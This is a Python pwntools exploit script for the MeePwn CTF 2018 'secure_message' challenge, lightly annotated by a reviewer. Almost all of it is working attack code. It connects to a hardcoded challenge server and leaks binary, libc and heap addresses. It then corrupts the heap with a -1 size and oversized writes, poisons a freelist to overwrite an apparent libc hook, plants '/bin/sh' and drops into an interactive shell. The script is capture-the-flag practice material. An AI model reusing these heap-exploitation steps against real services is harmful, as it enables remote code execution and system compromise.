MeePwn CTF 2018 Quals secure_message
#!/usr/bin/env python | |
from pwn import * | |
# Target binary and the pwntools context derived from it.
elf = ELF('./secure_message')
# libc = ELF('./libc-2.27.so')
context.update(os='linux', arch=elf.arch)
context.terminal = ['tmux', 'splitw', '-h']  # horizontal split window
# context.terminal = ['tmux', 'new-window']  # open new window
# Endpoints selected by the command-line option ('r' -> RHOST/RPORT, 'l' -> LHOST/LPORT).
RHOST, RPORT = "178.128.87.12", 31337
LHOST, LPORT = "127.0.0.1", 31337
def section_addr(name, elf=elf):
    """Return the load address (ELF header field sh_addr) of section *name* in *elf*.

    Raises AttributeError when the section does not exist, because
    get_section_by_name then returns None.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log the hex value of the expression string *ss*, e.g. dbg('libc_base').

    *ss* is passed to eval() in this module's scope, so it must only ever be a
    developer-written literal (a global name or simple expression), never text
    received from the connection.
    """
    value = eval(ss)
    message = "%s: 0x%x" % (ss, value)
    log.info(message)
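conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
# 'r' / 'l': connect to the remote or the local listener.  The previous test
# `opt in 'rl'` was a substring check, so '' and 'rl' also passed and then
# crashed with KeyError on the dict lookup; compare against the real choices.
if opt in ('r', 'l'):
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    # 'd': run under gdb.  The script never had a placeholder for main /
    # entrypoint, so the old .format(hex(...)) call was a no-op and is gone.
    gdbscript = """
continue
"""
    conn = gdb.debug(['./secure_message'], gdbscript=gdbscript)
else:
    # any other option: plain local process; 'a' additionally attaches gdb.
    conn = process(['./secure_message'])
    # conn = process(['./secure_message'], env={'LD_PRELOAD': './libc-2.27.so'})
    if opt == 'a':
        gdb.attach(conn)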
def register(name, password, desc):
    """Menu option 1: create an account on the service behind the global conn.

    Every field is sent with sendafter (no newline appended), so callers must
    include any terminator the service expects in the value itself.
    """
    conn.sendlineafter('Choice: ', '1')
    fields = (
        ('Username:', name),
        ('Password:', password),
        ('Describe your self', desc),
    )
    for prompt, answer in fields:
        conn.sendafter(prompt, answer)
def login(name, password):
    """Menu option 2: log in and consume output up to the 'Hello:' banner.

    Credentials are sent raw (sendafter), so newlines are the caller's job.
    """
    conn.sendlineafter('Choice: ', '2')
    for prompt, answer in (('Username:', name), ('Password:', password)):
        conn.sendafter(prompt, answer)
    conn.recvuntil('Hello:')
def quit():
    """Menu option 3: leave the current menu.

    The name shadows the builtin quit(); it is kept because callers use it.
    """
    choice = '3'
    conn.sendlineafter('Choice: ', choice)
def add(name, size, content):
    """Menu option 1 (as used after login() in this script): add a record.

    *size* is sent as the declared size; *content* is then sent raw after a
    short sleep rather than after a prompt, and its length is not compared
    with *size* here.
    """
    dialogue = (('Choice: ', '1'), ('Name: ', name), ('Size:', str(size)))
    for prompt, answer in dialogue:
        conn.sendlineafter(prompt, answer)
    time.sleep(0.1)  # no prompt to synchronise on before the content is read
    conn.send(content)
def edit(idx, size, content):
    """Menu option 3 (as used after login() in this script): edit record *idx*.

    *size* is passed through unchanged (the script also calls this with -1);
    *content* is sent raw after a short sleep, with no length check here.
    """
    dialogue = (('Choice: ', '3'), ('edit?', str(idx)), ('Size:', str(size)))
    for prompt, answer in dialogue:
        conn.sendlineafter(prompt, answer)
    time.sleep(0.1)  # no prompt to synchronise on before the content is read
    conn.send(content)
def remove(idx):
    """Menu option 2 (as used after login() in this script): delete record *idx*."""
    for prompt, answer in (('Choice: ', '2'), ('?', str(idx))):
        conn.sendlineafter(prompt, answer)
# exploit
# NOTE(review): Python 2 + pwntools (the leak lines rely on str.decode('hex')).
# Everything below is bound to one exact build of ./secure_message and its
# libc: 0x211d, 0x3ec2b0 and 0x250 are subtracted from leaked pointers, and
# 0x3ed8e8 / 0x4f440 are added to libc_base, none of them derived at run time.
# The 0xc9f68e5b26a07627, 0xdeadbeef000 and 0xbeefdead000 values are sent raw
# after each add(); what the service does with them is not visible here.
log.info('Pwning')
# Four accounts are created; only the first one is logged into.
register('hoge\n', 'fuga\n','a'*0x80)
register('b'*0x20,'b'*0x20,'b'*0x80)
register('c'*0x20,'c'*0x20,'c'*0x80)
register('d'*0x20,'d'*0x20,'d'*0x80)
login('hoge\n', 'fuga\n')
# Each add() is followed by extra raw sends; presumably the service reads
# further fields after the content -- confirm against the binary.
add('x'*0x18, 0xfd0, 'z'*0xfd0)
conn.send(p64(0xc9f68e5b26a07627))
conn.send(p64(0xc9f68e5b26a07627))
conn.send(p64(0xc9f68e5b26a07627))
add('y'*0x18, 0xfd0, 'w'*0xfd0)
conn.send(p64(0xc9f68e5b26a07627+0x1000))
conn.send(p64(0xc9f68e5b26a07627+0x1000))
conn.send(p64(0xc9f68e5b26a07627+0x1000))
# A size of -1 is passed straight through: the script depends on the service
# accepting it, which suggests the size field is not validated there
# (inferred from use; the server side is not in this file).
edit(0, -1, 'a'*0x1f00+'\n')
add('', 0xff, '\n')
conn.send(p64(0xc9f68e5b26a07627+0x3000))
conn.send(p64(0xc9f68e5b26a07627+0x3000))
conn.send(p64(0)*4)
#conn.send(p64(0xc9f68e5b26a07627+0x2000))
# Leak parsing: menu option 4 lists the records.  Six raw bytes after the
# 'yyy...' entry give a binary address; of the following three 14-byte
# fields the first and third are hex-decoded into a libc and a heap address,
# the middle one is skipped.  The fixed subtractions yield the mapping bases.
conn.sendlineafter('Choice: ', '4')
conn.recvuntil('1 - [yyyyyyyyyyyyyyyyyyyyyyyy')
bin_base = u64(conn.recv(6)+'\x00\x00') - 0x211d
dbg('bin_base')
conn.recvuntil('\n')
libc_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x3ec2b0
dbg('libc_base')
conn.recv(14)
heap_base = u64(conn.recv(14).decode('hex')+'\x00') - 0x250
dbg('heap_base')
add('aaaaaa', 0x1000, 'b'*0x1000)
conn.send(p64(0xdeadbeef000))
conn.send(p64(0xdeadbeef000))
conn.send(p64(0)*4)
# Declared size 0x100 but 0x1000 bytes of content are sent: the content length
# is never bounded by the declared size on this side.
add('target', 0x100, 'c'*0x1000)
conn.send(p64(0xdeadbef0000))
conn.send(p64(0xdeadbef0000))
conn.send(p64(0)*4)
edit(2, 8192, 'hoge\n')
# Hand-built record contents; the embedded constants (0x100, 1, 0x31,
# 0xe5b26a08030 + 0x10) are layout values for this specific build.
payload = 'd'*0xfd0 + p32(0x100) + p32(1) + p64(0xe5b26a08030 + 0x10)
add('aaaaaa', 0x1100, payload+'\n')
conn.send(p64(0x00000deadbef0000-0x1000))
conn.send(p64(0x00000deadbef0000-0x1000))
conn.send(p64(0)*4)
payload = p64(0) + p64(0x31)
payload += p64(0) * 5
payload += p64(0x31)
edit(0, 0x100, payload+'\n')
remove(2)
payload = p64(0) + p64(0x31)
# libc_base + 0x3ed8e8: a libc-internal offset, valid only for the libc this
# script was written against (presumably the libc-2.27.so named in the
# commented-out ELF line near the top -- verify before reuse).
payload += p64(libc_base + 0x3ed8e8)+p64(0) * 4
payload += p64(0x31)
edit(0, 0x100, payload+'\n')
add('a', 0xf00, 'hoge\n')
conn.send(p64(0xbeefdead000))
conn.send(p64(0xbeefdead000))
conn.send(p64(0)*4)
add('a', 0xf00, '/bin/sh\x00\n')
conn.send(p64(0xbeefdead000))
conn.send(p64(0xbeefdead000))
# libc_base + 0x4f440: likewise a build-specific libc offset, not derived here.
conn.send(p64(libc_base+0x4f440))
conn.interactive()